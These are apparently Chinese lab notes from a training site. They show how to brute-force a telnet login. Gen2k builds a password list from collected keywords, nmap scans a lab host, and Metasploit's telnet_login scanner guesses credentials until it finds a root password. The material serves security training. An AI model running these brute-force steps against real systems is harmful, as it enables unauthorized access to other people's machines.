实验吧笔记-Metasploit批量验证爆破telnet

Metasploit批量验证爆破telnet

    实验原理：
        
        1) 利用gen2k工具，根据收集来的信息，自动生成密码，使用枚举的方法破解telnet登陆密码。
        
    实验步骤：    
        
        一、利用gen2k工具生成密码表
        
            1.1 使用gen2k工具生成密码表。单击桌面空白处，右键菜单选择“在终端中打开”
            1.2 在终端中输入命令“cd /home”，进入软件目录，在终端中输入命令“more user.txt”,查看已收集到的关键词文件“user.txt”，利用此文件生成对应的密码
            1.3 在终端中输入命令“python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt”，生成密码文件passwd.txt，在终端下输入命令“more passwd.txt”,查看生成的内容
        
        二、利用Metasploit暴破目标主机telnet服务
        
            2.1 在终端中输入命令“nmap –sV 192.168.1.3”，扫描目标主机，发现目标主机开启telnet服务
            2.2 在终端中输入命令“msfconsole”，启动MSF终端
            2.3 在终端中输入命令“search telnet”，搜索telnet的相关工具和攻击载荷
            2.4 在终端中输入命令“use auxiliary/scanner/telnet/telnet_login”，启用漏洞利用模块, 提示符就会提示进入到该路径下
            2.5 在终端中输入命令“set RHOSTS 192.168.1.3”，设置目标主机的IP地址。
            2.6 在终端中输入命令“set PASS_FILE /home/passwd.txt”，爆破时使用的密码文件为passwd.txt。
            2.7 在终端中输入命令“set USER_FILE /home/user.txt”，爆破时使用的用户名文件为user.txt。
            2.8 在终端中输入“exploit 192.168.1.3”, 对目标主机进行暴力破解。
            2.9 拆解到密码
            2.10 在终端中输入“telnet 192.168.1.3 ”,输入获取的账号root和密码Simplexue123,连接成功。